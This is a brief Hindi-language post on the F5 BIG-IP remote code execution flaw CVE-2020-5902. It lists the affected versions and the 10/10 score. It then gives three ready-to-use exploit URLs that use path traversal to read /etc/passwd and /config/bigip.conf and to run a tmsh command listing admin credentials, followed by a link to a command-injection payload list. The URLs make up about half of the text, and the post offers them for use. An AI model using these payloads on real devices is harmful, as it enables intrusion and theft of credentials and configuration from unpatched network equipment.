
BIG-IP F5 रिमोट कोड एक्ज़ीक्यूशन
BIG-IP F5 रिमोट कोड एक्ज़िक्यूशन
ये हमले F5 Networks द्वारा निर्मित एक बहुउद्देशीय नेटवर्किंग डिवाइस BIG-IP को लक्षित कर रहे हैं। BIG-IP डिवाइसों को ट्रैफ़िक शेपिंग सिस्टम, लोड बैलेंसर, फ़ायरवॉल, एक्सेस गेटवे, रेट लिमिटर, या SSL मिडलवेयर के रूप में कार्य करने के लिए कॉन्फ़िगर किया जा सकता है।
बुधवार को, F5 Networks ने पैच प्रकाशित किए और BIG-IP डिवाइसों में "रिमोट कोड एक्ज़िक्यूशन" भेद्यता के बारे में एक सुरक्षा सलाह जारी की।
F5 ने कहा कि CVE-2020-5902 के रूप में ट्रैक की जाने वाली यह भेद्यता हमलावरों को इंटरनेट पर सुलभ बिना पैच वाले सिस्टम पर पूर्ण नियंत्रण लेने की अनुमति दे सकती है।
Version BIG-IP Vulnerable : 15.0.0-15.1.0.3, 14.*.*, 13.*.*, 12.*.*, 11.*.*
Vulnerability : Remote Code Execution (RCE)
Score CVE : 10/10
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://BIG-IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<BIG-IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://github.com/payloadbox/command-injection-payload-list
https://twitter.com/Nep_1337_1998/status/1279610946864820225
https://www.zdnet.com/article/hackers-are-trying-to-steal-admin-passwords-from-f5-big-ip-devices/